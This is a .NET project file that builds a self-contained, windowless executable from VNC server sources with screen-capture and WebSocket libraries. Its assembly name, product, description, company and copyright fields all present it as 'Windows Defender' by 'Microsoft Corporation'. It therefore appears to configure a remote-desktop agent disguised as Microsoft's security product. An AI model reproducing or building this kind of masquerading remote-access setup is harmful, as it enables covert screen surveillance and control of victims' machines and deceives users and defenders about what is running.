<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <TargetFramework>net8.0-windows</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
    <AssemblyName>Windows Defender</AssemblyName>
    <RootNamespace>Agent.VncDirect</RootNamespace>
    <Product>Windows Defender</Product>
    <Company>Microsoft Corporation</Company>
    <Copyright>Copyright © Microsoft Corporation</Copyright>
    <Description>Windows Defender</Description>
    <RuntimeIdentifier>win-x64</RuntimeIdentifier>
    <SelfContained>true</SelfContained>
    <PublishSingleFile>true</PublishSingleFile>
    <InvariantGlobalization>true</InvariantGlobalization>
    <DebugType>none</DebugType>
  </PropertyGroup>

  <ItemGroup>
    <Compile Include="..\Agent\VNC\VNCServer.cs" Link="VNC\VNCServer.cs" />
    <Compile Include="..\Agent\VNC\VNCFramebufferSource.cs" Link="VNC\VNCFramebufferSource.cs" />
  </ItemGroup>

  <ItemGroup>
    <PackageReference Include="Microsoft.Extensions.Logging" Version="8.0.1" />
    <PackageReference Include="ScreenCapture.NET.DX11" Version="3.0.0" />
    <PackageReference Include="Quamotion.RemoteViewing" Version="1.1.211" />
    <PackageReference Include="WebSocketSharp-netstandard" Version="1.0.1" />
  </ItemGroup>

</Project>